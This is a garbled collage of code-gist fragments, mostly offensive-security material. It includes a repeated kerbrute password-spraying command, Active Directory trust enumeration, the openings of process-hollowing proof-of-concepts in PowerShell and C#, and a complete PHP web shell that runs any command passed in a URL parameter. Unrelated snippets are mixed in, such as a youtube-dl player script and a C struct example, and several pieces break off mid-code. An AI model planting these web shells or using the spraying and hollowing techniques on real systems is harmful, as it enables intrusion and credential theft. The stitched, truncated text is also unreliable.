With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#define AssemblyDCStart_V1 155 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> | |
#include <wmistr.h> | |
#include <evntrace.h> | |
#include <Evntcons.h> |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Pipes; | |
using System.Threading; | |
using System.Diagnostics; | |
using System.Security.Principal; | |
using System.Security.AccessControl; | |
using System.Runtime.InteropServices; | |
using System.ComponentModel; |
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
function Start-Hollow { | |
<# | |
.SYNOPSIS | |
This is a proof-of-concept for process hollowing. There is nothing new here except | |
maybe the use of NtCreateProcessEx which has some advantages in that it offers a | |
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext. | |
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's. | |
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible | |
to load the Hollow from an internal byte array straight into memory but I have not |
/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if($_GET['cmd']) | |
{ |
#!/usr/bin/env bash | |
youtube-dl -q -o- "$*" | mplayer -af scaletempo -softvol -softvol-max 400 -cache 8192 - | |
# Usage: | |
# youtube-mplayer.sh https://www.youtube.com/watch?v=v-OS-DgxuFo |
<?php | |
echo "<pre>"; | |
echo shell_exec($_GET['cmd']); | |
echo "</pre>"; | |
?> |
#include <stdio.h> | |
typedef struct _a { | |
void (*msg)(void); | |
} A; | |
typedef struct _b { | |
A parent; // herda as características de A | |
void (*msg)(void); | |
} B; |